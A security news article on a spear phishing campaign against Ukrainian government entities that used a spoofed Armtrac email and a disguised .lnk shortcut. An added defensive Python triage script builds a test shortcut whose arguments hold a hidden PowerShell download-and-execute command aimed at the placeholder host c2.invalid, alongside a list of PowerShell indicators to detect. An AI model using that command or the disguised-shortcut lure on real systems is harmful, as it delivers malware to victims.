Researchers have observed a spear phishing campaign targeting Ukrainian government entities, including military departments.
In early 2019, FireEye Threat Intelligence analyzed an email sent as part of this campaign. The email used “SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD” as its subject line and spoofed its sender address so that it appeared to come from Armtrac, a defense manufacturer based in the United Kingdom.
The email carried an attachment named “Armtrac-Commercial.7z.” Opening this archive revealed “Armtrac-Commercial.zip,” a second archive containing two benign documents taken from the official Armtrac website alongside a malicious .lnk (Windows shortcut) file. The shortcut used a forged extension to pose as a PDF while displaying a Microsoft Word icon; because Windows Explorer never shows the .lnk extension, a name such as “something.pdf.lnk” is displayed simply as “something.pdf.” When launched, the shortcut ran a PowerShell script that downloaded a second-stage payload from the attackers’ command-and-control (C&C) server.
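How a disguised shortcut of this kind can be triaged automatically, as an added example that is not part of the original article or of FireEye’s analysis: the Python below parses the ShellLinkHeader and StringData of each .lnk member according to the MS-SHLLINK layout, then flags a double extension, a borrowed Office icon and PowerShell download arguments. The archive, its member names, the shortcut target, the icon path and the C&C URL (c2.invalid, a reserved documentation domain) are all constructed for the demonstration and are not the real Armtrac-Commercial.zip; the outer 7z layer is omitted because the Python standard library cannot read 7z.

```python
from __future__ import annotations

import io
import struct
import zipfile

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 as stored on disk (Data1..3 little-endian)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80  # LinkFlags bits
# StringData fields in their fixed on-disk order, keyed by the LinkFlags bit that enables each
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt")
OFFICE_ICON_HOSTS = ("winword", "excel", "powerpnt", "acrord32", "wordpad")
LAUNCH_INDICATORS = ("powershell", "-encodedcommand", "-enc ", "-windowstyle hidden",
                     "bypass", "downloadstring", "downloadfile", "invoke-expression", "iex")


def parse_lnk(data: bytes) -> dict[str, str]:
    """Return the StringData fields of a Shell Link file; raise ValueError if it is not one."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("shorter than a ShellLinkHeader")
    if struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("bad HeaderSize or LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # 2-byte IDListSize, not counting itself
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # 4-byte LinkInfoSize that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields: dict[str, str] = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        nbytes = count * 2 if unicode else count
        raw = data[off + 2:off + 2 + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name}")
        off += 2 + nbytes
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def build_lnk(relative_path: str, arguments: str, icon_location: str, unicode: bool = True) -> bytes:
    """Serialize a minimal shortcut (header + three StringData fields + terminal block); fixture only."""
    flags = 0x08 | 0x20 | 0x40 | (IS_UNICODE if unicode else 0)
    # HeaderSize, CLSID, LinkFlags, FileAttributes (ARCHIVE), 3 timestamps, FileSize, IconIndex,
    # ShowCommand=7 (SW_SHOWMINNOACTIVE: window starts minimized and inactive), HotKey, Reserved1-3
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 7, 0, 0, 0, 0)

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le" if unicode else "cp1252")

    return (header + string_data(relative_path) + string_data(arguments)
            + string_data(icon_location) + b"\x00\x00\x00\x00")


def triage_member(name: str, data: bytes) -> list[str]:
    """Findings for one archive member; an empty list means it is not a shortcut."""
    lower = name.lower()
    if not lower.endswith(".lnk"):
        return []
    findings = []
    if lower[:-4].endswith(DOC_EXTS):  # Explorer never shows .lnk, so x.pdf.lnk displays as x.pdf
        findings.append(f"double extension: {name}")
    try:
        lnk = parse_lnk(data)
    except (ValueError, struct.error) as exc:
        return findings + [f"malformed shortcut: {exc}"]
    launch = (lnk.get("relative_path", "") + " " + lnk.get("arguments", "")).lower()
    if hits := [k for k in LAUNCH_INDICATORS if k in launch]:
        findings.append("suspicious launch: " + ", ".join(hits))
    icon = lnk.get("icon_location", "")
    if any(host in icon.lower() for host in OFFICE_ICON_HOSTS):
        findings.append(f"icon borrowed from {icon}")
    return findings


def scan_zip(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map member name to findings for every flagged member of an in-memory ZIP."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        report = {i.filename: triage_member(i.filename, zf.read(i))
                  for i in zf.infolist() if not i.is_dir()}
    return {name: f for name, f in report.items() if f}


def build_sample_zip() -> bytes:
    """Constructed stand-in for the lure: two harmless PDFs plus one disguised shortcut."""
    lnk = build_lnk(
        relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        arguments="-WindowStyle Hidden -ExecutionPolicy Bypass -Command "
                  "\"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2')\"",
        icon_location="%ProgramFiles%\\Microsoft Office\\root\\Office16\\WINWORD.EXE")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Commercial/Brochure.pdf", b"%PDF-1.4 benign placeholder")
        zf.writestr("Commercial/Price-List.pdf", b"%PDF-1.4 benign placeholder")
        zf.writestr("Commercial/Commercial-Offer.pdf.lnk", lnk)
    return buf.getvalue()
```

Running `scan_zip(build_sample_zip())` reports only the shortcut member, with three findings: the double extension, the PowerShell launch indicators (powershell, -windowstyle hidden, bypass, downloadstring, iex) and the WINWORD.EXE icon path. The parser deliberately stops after StringData and ignores ExtraData blocks; on real samples the LinkTargetIDList and LinkInfo are usually present and are skipped by size, which is why both optional sections are handled even though the constructed fixture omits them.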
By evaluating the compilation timestamps of the campaign’s malware samples, FireEye Threat Intelligence assessed that the threat actor behind this email has likely been active since at least 2014. Over that span the group appears to have refined its tradecraft, moving to a mix of custom and open-source malware. As FireEye explains in a blog post:
The 2018 campaign used standalone EXE or self-extracting RAR (SFX) files to infect victims. However, their recent activity showed increased sophistication by leveraging malicious LNK files. The group used open-source QUASARRAT and the RATVERMIN malware, which we have not seen used by any other groups.
The security firm also found connections between the campaign and the so-called Luhansk People’s Republic, a pro-Russia proto-state that declared its independence from Ukraine in 2014. Given that link, it is unsurprising that the actor behind the January 2019 email has focused much of its effort on Ukraine’s government since 2014.
Spear phishing campaigns like this one are a reminder to organizations everywhere, and especially to government entities, to run phishing simulations with their employees and to educate them about the most common types of phishing attacks.